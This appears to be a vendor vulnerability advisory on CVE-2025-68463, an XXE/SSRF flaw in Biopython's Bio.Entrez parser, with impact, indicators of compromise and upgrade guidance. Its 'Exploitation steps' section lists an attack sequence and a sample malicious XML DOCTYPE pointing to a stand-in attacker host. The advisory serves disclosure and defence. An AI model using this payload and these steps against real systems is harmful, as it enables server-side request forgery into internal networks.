CVE-2025-68463: 
Python vulnerability analysis and mitigation

Overview

CVE-2025-68463 is an XML External Entity (XXE) injection vulnerability in the Bio.Entrez module of Biopython, affecting all versions through 1.86. The flaw allows a network-adjacent attacker with low privileges to trigger unauthorized HTTP requests via crafted XML input, enabling Server-Side Request Forgery (SSRF) and limited information disclosure. It was reported on November 25, 2025, by researcher Sebastian Pipping, publicly disclosed on December 18, 2025, and fixed in Biopython 1.87 (released March 30, 2026). The CVSS v3.1 base score is 4.9 (Medium), assigned by MITRE (Github Advisory, Red Hat Advisory).

Technical details

The root cause is CWE-611 (Improper Restriction of XML External Entity Reference). The Bio.Entrez.DataHandler class — which powers Bio.Entrez.read and Bio.Entrez.parse — processes XML responses from NCBI's Entrez API and resolves DTD and XSD URLs via Python's urllib.request.urlopen when the referenced file is not found in the local filesystem cache. An attacker who can supply malicious XML (e.g., via a man-in-the-middle position or by controlling XML input to the parser) can embed a crafted DOCTYPE declaration referencing an arbitrary URL, causing the server running Biopython to issue an outbound HTTP GET request to an attacker-controlled or internal endpoint. The vulnerability is also susceptible to MITM-based cache poisoning due to the absence of TLS enforcement on fetched DTD/XSD resources. A detailed report with proof-of-concept code was published in the GitHub issue tracker (Biopython Issue #5109, oss-security).

Impact

Successful exploitation can result in limited confidentiality loss (e.g., disclosure of internal network topology or responses from internal services via SSRF) and limited availability impact (e.g., resource exhaustion from repeated outbound requests). Integrity is not directly affected. The scope change in the CVSS score reflects that the impact extends beyond the Biopython process itself to internal network resources that may be reachable from the host running the vulnerable code, making this particularly relevant in cloud or containerized bioinformatics environments (Github Advisory, Biopython Issue #5109).

Exploitability

No public proof-of-concept exploit code has been released beyond the demonstration script referenced in the original GitHub issue report. There is no evidence of in-the-wild exploitation, no known threat actor attribution, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.015% (3rd percentile), indicating a low near-term exploitation probability (Github Advisory, Feedly).

Exploitation steps

  1. Identify target: Locate an application or service that uses Biopython ≤ 1.86 and calls Bio.Entrez.read() or Bio.Entrez.parse() on XML data that can be influenced by an attacker (e.g., via MITM on an unencrypted HTTP connection to NCBI Entrez, or by supplying crafted XML directly).
  2. Craft malicious XML: Construct an XML payload containing a DOCTYPE declaration that references an attacker-controlled or internal URL, for example:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.internal/malicious.dtd">
<root/>
  1. Deliver the payload: Intercept or inject the crafted XML into the data stream processed by Bio.Entrez.DataHandler. This may require a MITM position on the HTTP connection between the Biopython application and NCBI, or control over an upstream data source.
  2. Trigger XXE/SSRF: When Bio.Entrez.read() or Bio.Entrez.parse() processes the malicious XML, the parser checks its local DTD cache; on a cache miss, it calls urllib.request.urlopen(url) with the attacker-supplied URL, issuing an outbound HTTP GET request.
  3. Collect results: Monitor the attacker-controlled server for incoming requests, which may reveal internal IP addresses, service banners, or other metadata from the host's network environment (Biopython Issue #5109, oss-security).

Indicators of compromise

  • Network: Unexpected outbound HTTP GET requests from the Biopython host to non-NCBI URLs or internal RFC-1918 addresses, particularly to paths resembling DTD or XSD filenames (e.g., *.dtd, *.xsd).
  • Network: Outbound connections to attacker-controlled domains or IP addresses originating from the Python process running Biopython.
  • Logs: Application or web server logs showing urllib or http.client activity fetching DTD/XSD resources from unexpected external or internal hosts.
  • Process: Python processes making unexpected network connections to internal services (e.g., metadata endpoints, internal APIs) that are not part of normal Entrez API communication.

Mitigation and workarounds

Upgrade Biopython to version 1.87 or later, which was released on March 30, 2026, and addresses this vulnerability via two pull requests (#5114 and #5148) that restrict external entity resolution in the XML parser (oss-security, Github Advisory). As a short-term workaround where upgrading is not immediately possible, disable or restrict outbound HTTP access from the host running Biopython to limit SSRF impact, and avoid passing untrusted XML data to Bio.Entrez.read() or Bio.Entrez.parse(). Additionally, consider using XML parsers with external entity processing explicitly disabled as a defense-in-depth measure.

Community reactions

The vulnerability was reported by Sebastian Pipping, who also posted a notification to the oss-security mailing list upon the release of Biopython 1.87, noting the fix for both the XXE and SSRF aspects of the issue (oss-security). Red Hat tracked the issue via Bugzilla and assigned it medium severity for their products (Red Hat Bugzilla). Fedora issued package updates for python-biopython across multiple releases. Community interest has been modest, consistent with the medium CVSS score and lack of active exploitation.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

bookworm

python-biopython

Affected

sid

python-biopython: 1.87+dfsg-1

Fixed

trixie

python-biopython

Affected

Ubuntu

Unknown

bionic (esm-apps)

python-biopython

Unknown

devel

python-biopython

Unknown

focal (esm-apps)

python-biopython

Unknown

jammy

python-biopython

Unknown

jammy (esm-apps)

python-biopython

Unknown

noble

python-biopython

Unknown

noble (esm-apps)

python-biopython

Unknown

resolute

python-biopython

Unknown

Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management